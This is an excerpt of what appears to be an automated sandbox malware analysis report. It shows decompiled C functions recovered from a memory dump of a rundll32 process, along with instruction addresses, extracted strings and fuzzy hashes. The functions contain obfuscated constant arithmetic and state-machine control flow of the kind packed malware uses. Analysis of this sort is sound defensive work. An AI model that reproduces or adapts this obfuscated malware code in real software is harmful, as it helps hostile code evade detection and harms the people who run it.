						goto L19;
					} else {
						if(_t200 == 0x2f3cb019) {
							_t184 = _t178;
							_t162 = E001B9B74(_t184, _v40, _v44);
							_t202 =  &(_t202[1]);
							_t200 = 0x25aa6a95;
							_t199 = _t199 + _t162;
							goto L1;
						} else {
							if(_t200 == 0x2f4090ca) {
								_push(_t184);
								_t165 = E001A56BA();
								_t202 =  &(_t202[1]);
								_t200 = 0x3c46948;
								_t199 = _t199 + _t165;
								goto L1;
							} else {
								if(_t200 != 0x3a1fb840) {
									goto L19;
								} else {
									_t184 = _t178 + 0x18;
									_t177 = E001B9B74(_t184, _v52, _v56);
									_t202 =  &(_t202[1]);
									_t200 = 0x2f172a96;
									_t199 = _t199 + _t177;
									goto L1;
								}
							}
						}
					}
					goto L22;
					L19:
				} while (_t200 != 0x329902d4);
				goto L22;
			}

0x001a510e
0x001a5111
0x001a5125
0x001a5126
0x001a512a
0x001a512d
0x001a5133
0x001a5135
0x001a5136
0x001a513e
0x001a5148
0x001a5151
0x001a5154
0x001a5158
0x001a5160
0x001a516d
0x001a5171
0x001a5176
0x001a517e
0x001a5186
0x001a518e
0x001a5193
0x001a519b
0x001a51a3
0x001a51ad
0x001a51b1
0x001a51b9
0x001a51c1
0x001a51d1
0x001a51d9
0x001a51dc
0x001a51e0
0x001a51e8
0x001a51f0
0x001a51fd
0x001a5201
0x001a5209
0x001a5211
0x001a5219
0x001a5221
0x001a5229
0x001a5231
0x001a5236
0x001a523e
0x001a5246
0x001a524e
0x001a525b
0x001a525f
0x001a5267
0x001a5274
0x001a5278
0x001a527d
0x001a5285
0x001a528d
0x001a5297
0x001a529b
0x001a52a3
0x001a52b3
0x001a52b6
0x001a52ba
0x001a52c2
0x001a52ca
0x001a52d2
0x001a52d7
0x001a52dc
0x001a52e4
0x001a52ec
0x001a52f4
0x001a52fc
0x001a5304
0x001a5309
0x001a5311
0x001a5319
0x001a531e
0x001a531e
0x001a5326
0x001a5326
0x001a5326
0x001a5326
0x001a5328
0x00000000
0x00000000
0x001a532e
0x001a53a6
0x00000000
0x001a5330
0x001a5336
0x001a5394
0x001a5395
0x001a539a
0x001a539d
0x001a53a2
0x00000000
0x001a5338
0x001a533e
0x001a545a
0x001a5463
0x001a5344
0x001a534a
0x001a537a
0x001a537b
0x001a5380
0x001a5383
0x001a5388
0x00000000
0x001a534c
0x001a5352
0x00000000
0x001a5358
0x001a5360
0x001a5361
0x001a5366
0x001a5369
0x001a536e
0x00000000
0x001a536e
0x001a5352
0x001a534a
0x001a533e
0x001a5336
0x001a5465
0x001a546e
0x001a546e
0x001a53b6
0x001a5432
0x001a5435
0x001a543a
0x001a543d
0x001a5442
0x00000000
0x001a53b8
0x001a53be
0x001a5414
0x001a5416
0x001a541b
0x001a541e
0x001a5423
0x00000000
0x001a53c0
0x001a53c6
0x001a53f7
0x001a53f8
0x001a53fd
0x001a5400
0x001a5405
0x00000000
0x001a53c8
0x001a53ce
0x00000000
0x001a53d0
0x001a53d8
0x001a53db
0x001a53e0
0x001a53e3
0x001a53e8
0x00000000
0x001a53e8
0x001a53ce
0x001a53c6
0x001a53be
0x00000000
0x001a5444
0x001a5444
0x00000000

Strings

hU, xrefs: 001A531E
"", xrefs: 001A5309
}$, xrefs: 001A5211
<, xrefs: 001A5267
;-, xrefs: 001A52DC
S", xrefs: 001A5229

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ""$;-$<$S"$hU$}$
API String ID: 0-2472750449
Opcode ID: a129b7fb8718606597956e79b880fa5646b9aaf60079f7aaee0b67f2be1e9da2
Instruction ID: 232187d90a18a85c33ae9e865d9004ee589467a85025a5abbb657a886da7b29b
Opcode Fuzzy Hash: a129b7fb8718606597956e79b880fa5646b9aaf60079f7aaee0b67f2be1e9da2
Instruction Fuzzy Hash: A68163B29097019FD758CF25D48A40FBAF2ABD5388F454A1DF49697260E3B9CA098F43

Uniqueness

Uniqueness Score: -1.00%

Function 001AABF8, Relevance: 7.7, Strings: 6, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001AABF8() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				short* _t167;
				void* _t175;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t213;
				void* _t215;

				_t215 = (_t213 & 0xfffffff8) - 0x258;
				_v528 = _v528 & 0x00000000;
				_v536 = 0x6d1405;
				_t175 = 0x1ce635c6;
				_v532 = 0x29b6bb;
				_v576 = 0xa8ac;
				_v576 = _v576 ^ 0x76f7902c;
				_v576 = _v576 + 0x4f2e;
				_v576 = _v576 ^ 0x76f7f3c7;
				_v568 = 0x6f1b;
				_v568 = _v568 | 0x170f9d39;
				_v568 = _v568 ^ 0x86cada1d;
				_v568 = _v568 ^ 0x91c52d69;
				_v560 = 0x624;
				_v560 = _v560 ^ 0xb68429cb;
				_t204 = 0x7f;
				_v560 = _v560 / _t204;
				_v560 = _v560 ^ 0x016fdf5e;
				_v592 = 0x5f46;
				_v592 = _v592 << 0xa;
				_t205 = 0x51;
				_v592 = _v592 * 0x57;
				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x040c669b;
				_v572 = 0x6972;
				_v572 = _v572 >> 4;
				_v572 = _v572 >> 2;
				_v572 = _v572 ^ 0x00002d05;
				_v584 = 0x9cd5;
				_v584 = _v584 ^ 0xcc4d316a;
				_v584 = _v584 + 0x8950;
				_v584 = _v584 ^ 0xf53b7d27;
				_v584 = _v584 ^ 0x3975710e;
				_v552 = 0xbc2c;
				_v552 = _v552 | 0xdc666a97;
				_v552 = _v552 ^ 0xdc669f6e;
				_v588 = 0xf214;
				_v588 = _v588 / _t205;
				_t206 = 0x18;
				_v588 = _v588 / _t206;
				_v588 = _v588 + 0xc6e9;
				_v588 = _v588 ^ 0x00009494;
				_v596 = 0xd5f2;
				_v596 = _v596 | 0xfc1dee36;
				_v596 = _v596 ^ 0xe7108454;
				_v596 = _v596 << 9;
				_v596 = _v596 ^ 0x1af777ad;
				_v600 = 0x5502;
				_v600 = _v600 >> 9;
				_v600 = _v600 | 0x978329f7;
				_v600 = _v600 + 0xffff1717;
				_v600 = _v600 ^ 0x97821e9b;
				_v564 = 0xc117;
				_v564 = _v564 | 0x469e39c3;
				_v564 = _v564 ^ 0x95552159;
				_v564 = _v564 ^ 0xd3cb8f59;
				_v540 = 0x80d1;
				_v540 = _v540 >> 1;
				_v540 = _v540 ^ 0x00000744;
				_v544 = 0xc52f;
				_t207 = 0x7b;
				_v544 = _v544 / _t207;
				_v544 = _v544 ^ 0x00004c53;
				_v580 = 0xf92a;
				_v580 = _v580 ^ 0x77c5b38c;
				_v580 = _v580 + 0x222;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0x3be2ef21;
				_v556 = 0x82cf;
				_v556 = _v556 + 0xffff6dbc;
				_v556 = _v556 * 0x2a;
				_v556 = _v556 ^ 0xfffd011e;
				_v548 = 0x71c3;
				_v548 = _v548 ^ 0x5a9b7de7;
				_v548 = _v548 ^ 0x5a9b4b0f;
				do {
					while(_t175 != 0x4858010) {
						if(_t175 == 0x1918070b) {
							_t167 = E001ABCA5(_v580,  &_v524, _v556, _v548, 0x1001d08f,  &_v524, 0);
						} else {
							if(_t175 == 0x1ce635c6) {
								_t175 = 0x241b1bce;
								continue;
							} else {
								_t221 = _t175 - 0x241b1bce;
								if(_t175 != 0x241b1bce) {
									goto L8;
								} else {
									_push(_v560);
									_push(_v568);
									E001AEC82(_t221, E001A5EBA(_v576, 0x1001f800, _t221), _v592, _v572, _v584, _v552,  *0x10020724 + 0x238,  &_v524);
									_t215 = _t215 + 0x24;
									_t167 = E001AED35(_v588, _t169, _v596, _v600);
									_t175 = 0x4858010;
									continue;
								}
							}
						}
						L11:
						return _t167;
					}
					_t167 = E001B1489(_v564, _v540, _v544,  &_v524);
					__eflags = 0;
					 *_t167 = 0;
					_t175 = 0x1918070b;
					L8:
					__eflags = _t175 - 0x11d0bfbf;
				} while (__eflags != 0);
				goto L11;
			}

0x001aabfe
0x001aac04
0x001aac0b
0x001aac13
0x001aac18
0x001aac20
0x001aac28
0x001aac30
0x001aac38
0x001aac40
0x001aac48
0x001aac50
0x001aac58
0x001aac60
0x001aac68
0x001aac7a
0x001aac7f
0x001aac85
0x001aac8d
0x001aac95
0x001aac9f
0x001aaca2
0x001aaca6
0x001aacab
0x001aacb3
0x001aacbb
0x001aacc0
0x001aacc5
0x001aaccd
0x001aacd5
0x001aacdd
0x001aace5
0x001aaced
0x001aacf5
0x001aacfd
0x001aad05
0x001aad0d
0x001aad1d
0x001aad25
0x001aad2a
0x001aad30
0x001aad38
0x001aad40
0x001aad48
0x001aad50
0x001aad58
0x001aad5d
0x001aad65
0x001aad6d
0x001aad72
0x001aad7a
0x001aad82
0x001aad8a
0x001aad92
0x001aad9a
0x001aada2
0x001aadaa
0x001aadb2
0x001aadb6
0x001aadbe
0x001aadca
0x001aadcd
0x001aadd6
0x001aade3
0x001aadf0
0x001aadf8
0x001aae00
0x001aae04
0x001aae0c
0x001aae14
0x001aae21
0x001aae25
0x001aae2d
0x001aae35
0x001aae3d
0x001aae45
0x001aae45
0x001aae4f
0x001aaf18
0x001aae55
0x001aae5b
0x001aaeca
0x00000000
0x001aae5d
0x001aae5d
0x001aae5f
0x00000000
0x001aae65
0x001aae65
0x001aae6e
0x001aaea6
0x001aaeab
0x001aaebc
0x001aaec3
0x00000000
0x001aaec3
0x001aae5f
0x001aae5b
0x001aaf20
0x001aaf27
0x001aaf27
0x001aaee2
0x001aaee9
0x001aaeeb
0x001aaeee
0x001aaef0
0x001aaef0
0x001aaef0
0x00000000

Strings

ar-KW, xrefs: 001AAE7B, 001AAE8E, 001AAE9F
.O, xrefs: 001AAC30
F_, xrefs: 001AAC8D
SL, xrefs: 001AADD6
ri, xrefs: 001AACB3
!;, xrefs: 001AAE04

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !;$.O$F_$SL$ar-KW$ri
API String ID: 0-3929936252
Opcode ID: a8d2fc54ff669117002c9fc7fa9fcd99a363390acb5287c390726ebf633a7f0e
Instruction ID: 6d924c77c3fd11260921cc4a921be4e4b6e84c056536497815a10b432e631fd1
Opcode Fuzzy Hash: a8d2fc54ff669117002c9fc7fa9fcd99a363390acb5287c390726ebf633a7f0e
Instruction Fuzzy Hash: 208120711083409FD358CF21D88A91FBBF2FB89758F508A1DF18A962A0C7B59A49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 001B02A0, Relevance: 7.6, Strings: 6, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001B02A0(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v328;
				char _t135;
				void* _t136;
				signed int _t138;
				void* _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				char* _t146;
				intOrPtr* _t165;

				_v60 = _v60 & 0x00000000;
				_v68 = 0x4f7bfe;
				_v64 = 0x68c972;
				_v36 = 0xecbc;
				_t165 = __ecx;
				_v36 = _v36 * 0x64;
				_v36 = _v36 + 0xccd8;
				_v36 = _v36 ^ 0x005d76ad;
				_v24 = 0xfb8;
				_v24 = _v24 + 0x642c;
				_v24 = _v24 | 0x53420eab;
				_v24 = _v24 ^ 0x83c2798b;
				_v24 = _v24 ^ 0xd0800736;
				_v52 = 0xc274;
				_v52 = _v52 | 0xd9b29d93;
				_v52 = _v52 ^ 0xd9b28065;
				_v40 = 0x51ef;
				_v40 = _v40 ^ 0xc43a7eac;
				_v40 = _v40 ^ 0xc43a0e7c;
				_v16 = 0xc3c;
				_v16 = _v16 + 0x7284;
				_v16 = _v16 << 1;
				_v16 = _v16 + 0xdd6d;
				_v16 = _v16 ^ 0x00019146;
				_v56 = 0x6ea9;
				_v56 = _v56 ^ 0xed472f9a;
				_v56 = _v56 ^ 0xed4700e9;
				_v8 = 0x6190;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x519c4c94;
				_t143 = 0x3c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0xe8ca6c19;
				_v32 = 0xfb59;
				_v32 = _v32 + 0xffffe572;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 ^ 0x00002906;
				_v48 = 0x5638;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x0000562e;
				_v44 = 0x8cea;
				_v44 = _v44 + 0x5b7e;
				_v44 = _v44 ^ 0x0000fa96;
				_v28 = 0x3d4d;
				_v28 = _v28 + 0xffffe27b;
				_v28 = _v28 + 0xffffcdf5;
				_t144 = 0x77;
				_v28 = _v28 / _t144;
				_v28 = _v28 ^ 0x0226f0ea;
				_v20 = 0xacd3;
				_v20 = _v20 + 0xffffb49a;
				_v20 = _v20 << 5;
				_t145 = 0x3a;
				_t146 =  &_v328;
				_v20 = _v20 / _t145;
				_v20 = _v20 ^ 0x00004843;
				_v12 = 0xc903;
				_v12 = _v12 | 0xefa122df;
				_v12 = _v12 ^ 0xd1041e30;
				_v12 = _v12 + 0xffff1c6e;
				_v12 = _v12 ^ 0x3ea57454;
				while(1) {
					_t135 =  *_t165;
					if(_t135 == 0) {
						break;
					}
					if(_t135 == 0x2e) {
						 *_t146 = 0;
					} else {
						 *_t146 = _t135;
						_t146 = _t146 + 1;
						_t165 = _t165 + 1;
						continue;
					}
					L6:
					_t136 = E001A7744(_v36,  &_v328, _v24, _v52);
					_t166 = _t136;
					if(_t136 != 0) {
						L8:
						_t138 = E001A8A4B(_v8, _v32, _t165 + 1, _v48, _v44);
						_push(_v12);
						_push(_v20);
						_push(_t138 ^ 0x5e3043f1);
						return E001A3266(_t166, _v28);
					}
					_t141 = E001ADC59( &_v328, _v40, _v16, _v56);
					_t166 = _t141;
					if(_t141 != 0) {
						goto L8;
					}
					return _t141;
				}
				goto L6;
			}

0x001b02a9
0x001b02af
0x001b02b6
0x001b02bd
0x001b02cc
0x001b02ce
0x001b02d1
0x001b02d8
0x001b02df
0x001b02e6
0x001b02ed
0x001b02f4
0x001b02fb
0x001b0302
0x001b0309
0x001b0310
0x001b0317
0x001b031e
0x001b0325
0x001b032c
0x001b0333
0x001b033a
0x001b033d
0x001b0344
0x001b034b
0x001b0352
0x001b0359
0x001b0360
0x001b0367
0x001b036b
0x001b0376
0x001b0379
0x001b037c
0x001b0383
0x001b038a
0x001b0391
0x001b0395
0x001b039c
0x001b03aa
0x001b03ad
0x001b03b4
0x001b03bb
0x001b03c2
0x001b03c9
0x001b03d0
0x001b03d7
0x001b03e1
0x001b03e6
0x001b03eb
0x001b03f2
0x001b03f9
0x001b0400
0x001b0407
0x001b040a
0x001b0410
0x001b0413
0x001b041a
0x001b0421
0x001b0428
0x001b042f
0x001b0436
0x001b0447
0x001b0447
0x001b044b
0x00000000
0x00000000
0x001b0441
0x001b044f
0x001b0443
0x001b0443
0x001b0445
0x001b0446
0x00000000
0x001b0446
0x001b0452
0x001b0461
0x001b0466
0x001b046c
0x001b048a
0x001b049a
0x001b049f
0x001b04a9
0x001b04af
0x00000000
0x001b04b5
0x001b047d
0x001b0482
0x001b0488
0x00000000
0x00000000
0x001b04bd
0x001b04bd
0x00000000

Strings

M=, xrefs: 001B03C9
~[, xrefs: 001B03BB
.V, xrefs: 001B03AD
,d, xrefs: 001B02E6
Q, xrefs: 001B0317
CH, xrefs: 001B0413

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,d$.V$CH$M=$~[$Q
API String ID: 0-3367398399
Opcode ID: 8623c4d063eda386c0079fe1176b1587d0847f08bf1179e11586d3ea329d2f2b
Instruction ID: 14ab80695f3d9ff80be2b08dca3441025116a42b4295f5d2a83bad36f13a9e6f
Opcode Fuzzy Hash: 8623c4d063eda386c0079fe1176b1587d0847f08bf1179e11586d3ea329d2f2b
Instruction Fuzzy Hash: 2E514271C0131AEBEF45CFE4D98A5EEBBB1FB58314F208189D011B62A0D7B90A46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001ACA68, Relevance: 6.4, Strings: 5, Instructions: 181
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001ACA68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t164;
				intOrPtr* _t183;
				void* _t185;
				void* _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int* _t204;

				_t183 = _a12;
				_push(_a20);
				_push(_a16);
				_push(_t183);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t164);
				_v4 = _v4 & 0x00000000;
				_t204 =  &(( &_v72)[7]);
				_v8 = 0x53e138;
				_v40 = 0x80a8;
				_t197 = 0;
				_v40 = _v40 ^ 0x479697d0;
				_t185 = 0x2a79b9cd;
				_v40 = _v40 + 0xffff1a14;
				_v40 = _v40 ^ 0x4795262f;
				_v56 = 0x4d2b;
				_v56 = _v56 << 1;
				_v56 = _v56 ^ 0x75104092;
				_t198 = 0x65;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 ^ 0xcf25f769;
				_v60 = 0xaeaa;
				_v60 = _v60 + 0xea29;
				_v60 = _v60 | 0xfb8605f4;
				_v60 = _v60 ^ 0xf88e7530;
				_v60 = _v60 ^ 0x0309f479;
				_v64 = 0x2bfb;
				_v64 = _v64 >> 5;
				_v64 = _v64 + 0x1d78;
				_v64 = _v64 | 0x1f5c2f35;
				_v64 = _v64 ^ 0x1f5c669e;
				_v68 = 0xde63;
				_v68 = _v68 ^ 0x9a434763;
				_v68 = _v68 + 0xdeb8;
				_v68 = _v68 / _t198;
				_v68 = _v68 ^ 0x0187248d;
				_v72 = 0x77fc;
				_v72 = _v72 >> 6;
				_v72 = _v72 * 0x1b;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0x00651f1b;
				_v20 = 0x45cd;
				_v20 = _v20 | 0x3e821fd4;
				_v20 = _v20 ^ 0x3e827345;
				_v48 = 0xf526;
				_v48 = _v48 * 0x7f;
				_v48 = _v48 + 0x1d9d;
				_v48 = _v48 + 0x2091;
				_v48 = _v48 ^ 0x0079e027;
				_v24 = 0xf668;
				_v24 = _v24 ^ 0x84882b2a;
				_v24 = _v24 ^ 0x8488b759;
				_v52 = 0x639e;
				_v52 = _v52 >> 0xa;
				_v52 = _v52 + 0xffffb961;
				_v52 = _v52 + 0xffffd511;
				_v52 = _v52 ^ 0xffffdc7d;
				_v12 = 0x1264;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000072bf;
				_v44 = 0xd4c4;
				_v44 = _v44 + 0xffff76e0;
				_v44 = _v44 >> 3;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x000026a9;
				_v16 = 0xea64;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x753209ee;
				_v28 = 0x1594;
				_v28 = _v28 + 0xb7d7;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x00062bdb;
				_v32 = 0x183e;
				_t199 = 0x34;
				_v32 = _v32 / _t199;
				_t200 = 3;
				_t201 = _v12;
				_v32 = _v32 / _t200;
				_v32 = _v32 ^ 0x000043fb;
				_v36 = 0x65be;
				_v36 = _v36 << 0xa;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x0019225e;
				while(_t185 != 0xa549ca5) {
					if(_t185 == 0x2795ab78) {
						_push(_t185);
						_push(_t185);
						_t197 = E001B922B(_t201);
						_t204 =  &(_t204[3]);
						if(_t197 != 0) {
							_t185 = 0xa549ca5;
							continue;
						}
					} else {
						if(_t185 == 0x2a79b9cd) {
							_t185 = 0x337bab1b;
							continue;
						} else {
							if(_t185 != 0x337bab1b) {
								L13:
								if(_t185 != 0x10206f3e) {
									continue;
								}
							} else {
								_t201 = E001A2C73(0, _v40, 0, _v56, _t185, _v60, _v64, _v68, _v72, _a20, _t185, _a4, _t185, _a8);
								_t204 =  &(_t204[0xc]);
								if(_t201 != 0) {
									_t185 = 0x2795ab78;
									continue;
								}
							}
						}
					}
					return _t197;
				}
				E001A2C73(_t197, _v12, _t201, _v44, _t185, _v16, _v28, _v32, _v36, _a20, _t185, _a4, _t185, _a8);
				_t204 =  &(_t204[0xc]);
				if(_t183 != 0) {
					 *_t183 = _t201;
				}
				_t185 = 0x10206f3e;
				goto L13;
			}

0x001aca6c
0x001aca73
0x001aca77
0x001aca7b
0x001aca7c
0x001aca80
0x001aca84
0x001aca85
0x001aca86
0x001aca8b
0x001aca90
0x001aca93
0x001aca9d
0x001acaa5
0x001acaa7
0x001acaaf
0x001acab4
0x001acabc
0x001acac4
0x001acacc
0x001acad0
0x001acadf
0x001acae0
0x001acae4
0x001acaec
0x001acaf4
0x001acafc
0x001acb04
0x001acb0c
0x001acb14
0x001acb1c
0x001acb21
0x001acb29
0x001acb31
0x001acb39
0x001acb41
0x001acb49
0x001acb57
0x001acb5b
0x001acb63
0x001acb6b
0x001acb75
0x001acb79
0x001acb7e
0x001acb86
0x001acb8e
0x001acb96
0x001acb9e
0x001acbab
0x001acbaf
0x001acbb7
0x001acbbf
0x001acbc7
0x001acbcf
0x001acbd7
0x001acbdf
0x001acbe7
0x001acbec
0x001acbf4
0x001acbfc
0x001acc04
0x001acc0c
0x001acc11
0x001acc19
0x001acc21
0x001acc29
0x001acc2e
0x001acc33
0x001acc3b
0x001acc43
0x001acc48
0x001acc52
0x001acc5f
0x001acc67
0x001acc6c
0x001acc74
0x001acc82
0x001acc87
0x001acc91
0x001acc94
0x001acc98
0x001acc9c
0x001acca4
0x001accac
0x001accb1
0x001accb6
0x001accbe
0x001acccc
0x001acd39
0x001acd3a
0x001acd41
0x001acd43
0x001acd48
0x001acd4a
0x00000000
0x001acd4a
0x001accce
0x001accd4
0x001acd22
0x00000000
0x001accd6
0x001accdc
0x001acd8e
0x001acd94
0x00000000
0x00000000
0x001acce2
0x001acd12
0x001acd14
0x001acd19
0x001acd1b
0x00000000
0x001acd1b
0x001acd19
0x001accdc
0x001accd4
0x001acda3
0x001acda3
0x001acd7b
0x001acd80
0x001acd85
0x001acd87
0x001acd87
0x001acd89
0x00000000

Strings

'y, xrefs: 001ACBBF
+M, xrefs: 001ACAC4
2u, xrefs: 001ACC48
), xrefs: 001ACAF4
8S, xrefs: 001ACA93

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'y$)$+M$8S$2u
API String ID: 0-3801018270
Opcode ID: 14f0f40ffde2a8e76ea74e9245fd567778dea82e95479db115f6e3bff33aa3fa
Instruction ID: 4d2f90bbc5be783868a574e130b2db52b00afddd0ca4b13be128caa8ed980f7b
Opcode Fuzzy Hash: 14f0f40ffde2a8e76ea74e9245fd567778dea82e95479db115f6e3bff33aa3fa
Instruction Fuzzy Hash: C3812172408340AFD358CF65C98981BBBF2FBC9758F104A1DF69696260D3B59A08CF87

Uniqueness

Uniqueness Score: -1.00%

Function 001BBFB0, Relevance: 6.4, Strings: 5, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001BBFB0(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t120;
				intOrPtr _t122;
				intOrPtr _t133;
				signed int _t134;
				signed int _t135;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t152;
				intOrPtr* _t153;
				void* _t154;
				intOrPtr _t155;

				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0x3f573f;
				_v12 = 0x28bff7;
				_v32 = 0xf6f8;
				_v32 = _v32 + 0xffff0ae4;
				_v32 = _v32 ^ 0x0000741e;
				_v56 = 0xb7fb;
				_v56 = _v56 + 0xfffff01f;
				_v56 = _v56 ^ 0x5c2a1c61;
				_v56 = _v56 ^ 0x5c2adb68;
				_v60 = 0x9f6c;
				_v60 = _v60 ^ 0x03150f05;
				_v60 = _v60 | 0x45bbd529;
				_v60 = _v60 + 0x3144;
				_v60 = _v60 ^ 0x47c07da1;
				_v48 = 0x5e52;
				_v48 = _v48 | 0x724b1708;
				_v48 = _v48 + 0x6c65;
				_v48 = _v48 ^ 0x724ba047;
				_v52 = 0x2041;
				_v52 = _v52 | 0x6fdf95dc;
				_v52 = _v52 + 0xffffb60e;
				_v52 = _v52 ^ 0x6fdf4c2c;
				_v36 = 0x5820;
				_v36 = _v36 | 0x2f79794a;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 ^ 0x000097bc;
				_v40 = 0x52df;
				_v40 = _v40 ^ 0xb23dfe95;
				_v40 = _v40 | 0x872ce1f7;
				_v40 = _v40 ^ 0xb73da89c;
				_v44 = 0x6af4;
				_v44 = _v44 + 0xffff26e8;
				_t134 = 0x72;
				_v44 = _v44 / _t134;
				_v44 = _v44 ^ 0x023ed37f;
				_v28 = 0xb8bf;
				_t135 = 6;
				_v28 = _v28 / _t135;
				_v28 = _v28 ^ 0x00006e86;
				_v20 = 0x86b5;
				_v20 = _v20 + 0xffff42b7;
				_v20 = _v20 ^ 0xffffc85c;
				_v24 = 0x8729;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x00083b6d;
				_t120 = E001B686E(_t135);
				_t152 = _a4;
				_t154 = _t120;
				_v56 = 0x8f1c;
				_v56 = _v56 + 0xffff2747;
				_v56 = _v56 | 0x9aae4419;
				_v56 = _v56 ^ 0xfffff67b;
				_t156 = _t152 + 0x24;
				_t133 = E001B7A96(_v48, _t152 + 0x24, _v52);
				_t122 =  *((intOrPtr*)(_t152 + 8));
				if(_t122 != _v56 && _t122 != _t154) {
					_t139 =  *((intOrPtr*)(_t152 + 0x18));
					if(_t139 != _v56 && _t139 != _t154) {
						_t153 = _a8;
						_t140 =  *_t153;
						if(E001A4CD5(_t140, _t133) == 0) {
							_push(_t140);
							_push(_t140);
							_t155 = E001B922B(0x244);
							if(_t155 != 0) {
								_t110 = _t155 + 8; // 0x8
								E001AD456(_t156, _v20, _t110, _v24);
								 *((intOrPtr*)(_t155 + 0x224)) = _t133;
								 *((intOrPtr*)(_t155 + 0x218)) =  *_t153;
								 *_t153 = _t155;
							}
						}
					}
				}
				return 1;
			}

0x001bbfb7
0x001bbfbe
0x001bbfc3
0x001bbfcb
0x001bbfd3
0x001bbfdb
0x001bbfe3
0x001bbfeb
0x001bbff3
0x001bbffb
0x001bc003
0x001bc00b
0x001bc013
0x001bc01b
0x001bc023
0x001bc02b
0x001bc033
0x001bc03b
0x001bc043
0x001bc04b
0x001bc053
0x001bc05b
0x001bc063
0x001bc06b
0x001bc073
0x001bc07b
0x001bc083
0x001bc088
0x001bc090
0x001bc098
0x001bc0a0
0x001bc0a8
0x001bc0b0
0x001bc0b8
0x001bc0c6
0x001bc0cb
0x001bc0d1
0x001bc0d9
0x001bc0e5
0x001bc0e8
0x001bc0ec
0x001bc0f4
0x001bc0fc
0x001bc104
0x001bc10c
0x001bc114
0x001bc119
0x001bc129
0x001bc12e
0x001bc132
0x001bc134
0x001bc13c
0x001bc144
0x001bc14c
0x001bc154
0x001bc169
0x001bc16b
0x001bc174
0x001bc17a
0x001bc181
0x001bc187
0x001bc18d
0x001bc196
0x001bc1a8
0x001bc1a9
